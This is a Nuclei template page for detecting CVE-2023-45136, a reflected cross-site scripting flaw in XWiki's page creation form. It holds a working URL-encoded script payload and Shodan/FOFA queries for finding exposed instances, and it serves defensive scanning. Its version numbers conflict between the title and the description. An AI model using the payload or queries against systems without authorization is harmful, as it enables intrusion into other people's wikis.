Skip to content
Nuclei Templates

XWiki < 14.10.14 - Cross-Site Scripting

ID: CVE-2023-45136

Severity: medium

Author: ritikchaddha

Tags: cve,cve2024,xwiki,xss

Description

Section titled “Description”

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When document names are validated according to a name strategy (disabled by default), XWiki starting in version 12.0-rc-1 and prior to versions 12.10.12 and 15.5-rc-1 is vulnerable to a reflected cross-site scripting attack in the page creation form. This allows an attacker to execute arbitrary actions with the rights of the user opening the malicious link.

YAML Source

Section titled “YAML Source”
id: CVE-2023-45136


info:
  name: XWiki < 14.10.14 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When document names are validated according to a name strategy (disabled by default), XWiki starting in version 12.0-rc-1 and prior to versions 12.10.12 and 15.5-rc-1 is vulnerable to a reflected cross-site scripting attack in the page creation form. This allows an attacker to execute arbitrary actions with the rights of the user opening the malicious link.
  impact: |
    Successful exploitation could lead to cross-site scripting attack.
  remediation: |
    This has been patched in XWiki 14.10.12 and 15.5-rc-1 by adding appropriate escaping.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-20854
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45136
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-45136
    cwe-id: CWE-79
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2024,xwiki,xss


http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
      - "{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<script>alert(document.domain)</script>", "data-xwiki-reference")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c614cc98f959fdca4c6d49d2b6dcafc67afae01cc18a959acf7a3f8dd8be6e99022044d126880255f0ca40ed9a807bd7efae47bd3318264486007b5b137bbc705871:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-45136.yaml"

View on Github